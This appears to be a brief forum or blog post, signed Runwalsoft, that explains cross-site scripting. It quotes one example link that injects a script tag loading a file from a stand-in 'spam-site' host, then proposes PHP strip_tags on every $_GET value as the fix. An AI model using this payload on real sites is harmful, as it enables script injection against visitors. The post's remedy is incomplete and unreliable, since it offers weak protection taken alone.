This is called cross site scripting (XSS) attacks.

How peoples exploits just using input fields which generally provided on the site.

<A HREF="http://sitename.com/comment.cmi?  mycomment=<SCRIPT  SRC='http://spam-site/badfile'></SCRIPT>"> Click here</A> 

There might be different solution to solve this. for as we have find one unquie way. just use strip_tags in each $_GET method. if you think that there are any other method and there are different ways. or your comments and suggessions are welcomed.

Solution by : Runwalsoft (Manish Runwal)